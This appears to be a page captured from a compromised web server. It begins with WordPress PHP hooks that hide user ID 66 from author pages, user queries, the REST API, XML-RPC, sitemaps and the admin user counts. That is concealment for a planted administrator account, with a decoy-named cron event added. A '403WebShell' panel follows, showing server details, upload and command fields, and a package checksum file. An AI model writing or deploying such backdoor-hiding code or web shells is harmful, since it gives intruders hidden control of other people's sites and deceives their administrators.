add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/bash.md5sums
d740b995da644fb53ecd42a9af304934  usr/bin/bash
3814a8143c350ec9429ccb227806f6a2  usr/bin/bashbug
bf93547f796932efadc1dcf7ae1175b6  usr/bin/clear_console
b0840061f097580c502a10137ba09af6  usr/share/debianutils/shells.d/bash
e33c919ed8b88f5895591eb2aed571af  usr/share/doc/bash/COMPAT.gz
ab78b78be766692463cb112b88d5a74f  usr/share/doc/bash/INTRO.gz
da7755d44d7ebecdc872cf866dbd45e8  usr/share/doc/bash/NEWS.gz
03ee8a82c581d332f2b7b95a2cf47f8d  usr/share/doc/bash/POSIX.gz
c2737a3f295b4b1ddc40605d2053531a  usr/share/doc/bash/RBASH
6bd7de8b98911613a536e83867e9b490  usr/share/doc/bash/README.Debian.gz
5dac7b9b6332d9845e315cf8fd50ea89  usr/share/doc/bash/README.abs-guide
007dea9b8141f038c602b23f78509e34  usr/share/doc/bash/README.commands.gz
9b463610f80c54e22bb845da563040d6  usr/share/doc/bash/README.gz
fda2a94ff515b79aba87c848d17be87f  usr/share/doc/bash/changelog.Debian.gz
a7b4d52dcef4931d6a74b71e0f25f568  usr/share/doc/bash/copyright
244319c9dd88c980910aacd76477b8d9  usr/share/doc/bash/inputrc.arrows
4574de6676d74019761f409168aa8e01  usr/share/lintian/overrides/bash
cc43cc10ce99183a178715ed7e806b27  usr/share/man/man1/bash.1.gz
ab8320c478c9d17caaa4d86e113cf0a2  usr/share/man/man1/bashbug.1.gz
0c912132bdbce02861669392deb3f84c  usr/share/man/man1/clear_console.1.gz
d3953212dcd88f5ee9f4441ab3b7fa49  usr/share/man/man1/rbash.1.gz
b2fb88f251700c29d638d9202e89a693  usr/share/man/man7/bash-builtins.7.gz
0c05a14279f95fdb4618a4ccaa469681  usr/share/menu/bash

Youez - 2016 - github.com/yon3zu
LinuXploit